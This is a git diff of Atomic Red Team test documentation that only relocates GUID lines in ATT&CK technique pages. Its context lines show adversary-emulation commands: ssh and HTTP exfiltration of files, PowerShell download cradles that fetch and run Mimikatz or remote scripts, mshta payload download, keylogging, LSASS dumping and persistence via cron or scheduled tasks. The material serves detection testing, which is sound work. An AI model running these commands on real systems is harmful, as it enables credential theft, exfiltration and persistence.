## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS - -auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 - Exfiltration of specified file over DNS protocol. + **Supported Platforms:** Linux +**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45 + + + #### Run it with these steps! @@ -122,14 +128,16 @@ Exfiltration of specified file over DNS protocol.
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP - -auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c - Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c + + + #### Inputs: @@ -156,14 +164,16 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP - -auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 - Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9 + + + #### Inputs: diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index e60fdc42..53137544 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -16,17 +16,19 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH - -auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988 - Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988 + + + #### Inputs: @@ -51,17 +53,19 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH - -auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 - Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268 + + + #### Inputs: diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 192508b7..edc081e0 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -20,15 +20,17 @@ Utilities and commands that acquire this information include [netstat](https://a
## Atomic Test #1 - System Network Connections Discovery - -auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5 - Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5 + + + @@ -50,15 +52,17 @@ net sessions
## Atomic Test #2 - System Network Connections Discovery with PowerShell - -auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a - Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a + + + @@ -78,15 +82,17 @@ Get-NetTCPConnection
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS - -auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 - Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 + + + @@ -119,15 +125,17 @@ echo "Install netstat on the machine."; exit 1;
## Atomic Test #4 - System Discovery using SharpView - -auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 - Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9 + + + #### Inputs: diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md index 77547ae1..64bdb473 100644 --- a/atomics/T1053.001/T1053.001.md +++ b/atomics/T1053.001/T1053.001.md @@ -12,13 +12,15 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
## Atomic Test #1 - At - Schedule a job - -auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - This test submits a command to be run in the future by the `at` daemon. + **Supported Platforms:** Linux +**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e + + + #### Inputs: diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md index 0e22c703..615c84dd 100644 --- a/atomics/T1053.002/T1053.002.md +++ b/atomics/T1053.002/T1053.002.md @@ -14,16 +14,18 @@ Note: The at.exe command line utility has been deprecated in curren
## Atomic Test #1 - At.exe Scheduled task - -auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. + **Supported Platforms:** Windows +**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + + + diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index 47c5272a..dd2cfbef 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -16,13 +16,15 @@ An adversary may use cron in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file - -auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75 + + + #### Inputs: @@ -53,13 +55,15 @@ crontab /tmp/notevil
## Atomic Test #2 - Cron - Add script to all cron subfolders - -auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + + + #### Inputs: @@ -95,13 +99,15 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder - -auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4 + + + #### Inputs: diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md index bed322f3..3692545d 100644 --- a/atomics/T1053.004/T1053.004.md +++ b/atomics/T1053.004/T1053.004.md @@ -12,13 +12,15 @@ An adversary may use the launchd daemon in macOS environments to sc
## Atomic Test #1 - Event Monitor Daemon Persistence - -auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. + **Supported Platforms:** macOS +**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e + + + #### Inputs: diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 9fd444d6..5c41ae1d 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -24,14 +24,16 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
## Atomic Test #1 - Scheduled Task Startup Script - -auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. + **Supported Platforms:** Windows +**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2 + + + @@ -57,13 +59,15 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
## Atomic Test #2 - Scheduled task Local - -auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. + **Supported Platforms:** Windows +**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71 + + + #### Inputs: @@ -93,15 +97,17 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
## Atomic Test #3 - Scheduled task Remote - -auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + **Supported Platforms:** Windows +**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + + + #### Inputs: @@ -134,15 +140,17 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
## Atomic Test #4 - Powershell Cmdlet Scheduled Task - -auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. + **Supported Platforms:** Windows +**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + + + @@ -171,14 +179,16 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
## Atomic Test #5 - Task Scheduler via VBA - -auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run + **Supported Platforms:** Windows +**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3 + + + #### Inputs: @@ -222,13 +232,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task - -auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. + **Supported Platforms:** Windows +**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + + + diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md index 998c17fb..1c020d8c 100644 --- a/atomics/T1053.006/T1053.006.md +++ b/atomics/T1053.006/T1053.006.md @@ -14,13 +14,15 @@ An adversary may use systemd timers to execute malicious code at system startup
## Atomic Test #1 - Create Systemd Service and Timer - -auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - This test creates Systemd service and timer then starts and enables the Systemd timer + **Supported Platforms:** Linux +**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b + + + #### Inputs: diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index eefb07ca..fc86bcbc 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -14,13 +14,15 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
## Atomic Test #1 - ListCronjobs - -auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd - Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get cronjobs -n #{namespace}
## Atomic Test #2 - CreateCronjob - -auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 - Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + + + #### Inputs: diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index 76a8f433..c014cfde 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -16,16 +16,18 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via mavinject.exe - -auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - Windows 10 Utility To Inject DLLS. Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + **Supported Platforms:** Windows +**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254 + + + #### Inputs: diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md index a007e2cc..06a329a9 100644 --- a/atomics/T1055.004/T1055.004.md +++ b/atomics/T1055.004/T1055.004.md @@ -16,9 +16,6 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via C# - -auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 - Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques @@ -28,9 +25,14 @@ Excercises Five Techniques 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1 + + + #### Inputs: diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index e514407f..df2fa1a2 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -16,14 +16,16 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
## Atomic Test #1 - Process Hollowing using PowerShell - -auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c - This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c + + + #### Inputs: @@ -57,13 +59,15 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
## Atomic Test #2 - RunPE via VBA - -auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b - This module executes notepad.exe from within the WINWORD.EXE process + **Supported Platforms:** Windows +**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b + + + #### Inputs: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 48f20359..453192f3 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -16,17 +16,19 @@ More sophisticated samples may perform multiple process injections to segment mo
## Atomic Test #1 - Shellcode execution via VBA - -auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 - This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required. + **Supported Platforms:** Windows +**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048 + + + @@ -65,16 +67,18 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz - -auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 - Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). It must be executed in the context of a user who is privileged on remote `machine`. The effect of `/inject` is explained in + **Supported Platforms:** Windows +**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83 + + + #### Inputs: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index f0ac2787..76f5881a 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -20,17 +20,19 @@ Keylogging is the most prevalent type of input capture, with many different ways
## Atomic Test #1 - Input Capture - -auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 - Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. + **Supported Platforms:** Windows +**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26 + + + #### Inputs: @@ -60,17 +62,19 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d - -auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b - Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. + **Supported Platforms:** Linux +**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b + + + diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md index 4cedb33c..fa8c19e0 100644 --- a/atomics/T1056.002/T1056.002.md +++ b/atomics/T1056.002/T1056.002.md @@ -14,14 +14,16 @@ Adversaries may mimic this functionality to prompt users for credentials with a
## Atomic Test #1 - AppleScript - Prompt User for Password - -auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 - Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html + **Supported Platforms:** macOS +**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15 + + + @@ -41,15 +43,17 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
## Atomic Test #2 - PowerShell - Prompt User for Password - -auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 - Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py + **Supported Platforms:** Windows +**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 + + + diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index f9fef8ef..b3eab452 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -15,13 +15,15 @@
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages - -auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 - Hooks functions in PowerShell to read TLS Communications + **Supported Platforms:** Windows +**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33 + + + #### Inputs: diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 40a1227b..68e6c297 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -14,15 +14,17 @@ In Windows environments, adversaries could obtain details on running processes u
## Atomic Test #1 - Process Discovery - ps - -auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc - Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc + + + #### Inputs: @@ -52,15 +54,17 @@ rm #{output_file}
## Atomic Test #2 - Process Discovery - tasklist - -auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 - Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908 + + + diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index aa9120ec..d86d109d 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,13 +50,15 @@ PowerShell commands/scripts can also be executed without directly invoking the <
## Atomic Test #1 - Mimikatz - -auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027 - Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027 + + + #### Inputs: @@ -81,15 +83,17 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - Run BloodHound from local disk - -auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350 - Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. + **Supported Platforms:** Windows +**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350 + + + #### Inputs: @@ -133,15 +137,17 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle - -auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 - Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. + **Supported Platforms:** Windows +**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7 + + + @@ -168,13 +174,15 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
## Atomic Test #4 - Obfuscation Tests - -auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" + **Supported Platforms:** Windows +**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804 + + + @@ -196,13 +204,15 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys - -auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d - Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d + + + @@ -222,15 +232,17 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
## Atomic Test #6 - Invoke-AppPathBypass - -auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372 - Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + **Supported Platforms:** Windows +**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372 + + + @@ -250,15 +262,17 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
## Atomic Test #7 - Powershell MsXml COM object - with prompt - -auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da - Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da + + + #### Inputs: @@ -283,15 +297,17 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
## Atomic Test #8 - Powershell XML requests - -auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 - Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6 + + + #### Inputs: @@ -316,15 +332,17 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
## Atomic Test #9 - Powershell invoke mshta.exe download - -auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af - Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af + + + #### Inputs: @@ -349,14 +367,16 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
## Atomic Test #10 - Powershell Invoke-DownloadCradle - -auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 - Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. + **Supported Platforms:** Windows +**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 + + + #### Run it with these steps! @@ -373,14 +393,16 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
## Atomic Test #11 - PowerShell Fileless Script Execution - -auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73 - Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. + **Supported Platforms:** Windows +**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73 + + + @@ -407,15 +429,17 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
## Atomic Test #12 - PowerShell Downgrade Attack - -auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e - This test requires the manual installation of PowerShell V2. Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e + + + @@ -447,13 +471,15 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
## Atomic Test #13 - NTFS Alternate Data Stream Access - -auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 - Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 + + + #### Inputs: @@ -496,14 +522,16 @@ Write-Host Prereq's for this test cannot be met automatically
## Atomic Test #14 - PowerShell Session Creation and Use - -auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd - Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd + + + #### Inputs: @@ -550,13 +578,15 @@ Enable-PSRemoting
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations - -auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7 - Executes powershell.exe with variations of the -Command parameter + **Supported Platforms:** Windows +**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7 + + + #### Inputs: @@ -596,13 +626,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments - -auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790 - Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied + **Supported Platforms:** Windows +**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790 + + + #### Inputs: @@ -643,13 +675,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations - -auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 - Executes powershell.exe with variations of the -EncodedCommand parameter + **Supported Platforms:** Windows +**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 + + + #### Inputs: @@ -689,13 +723,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
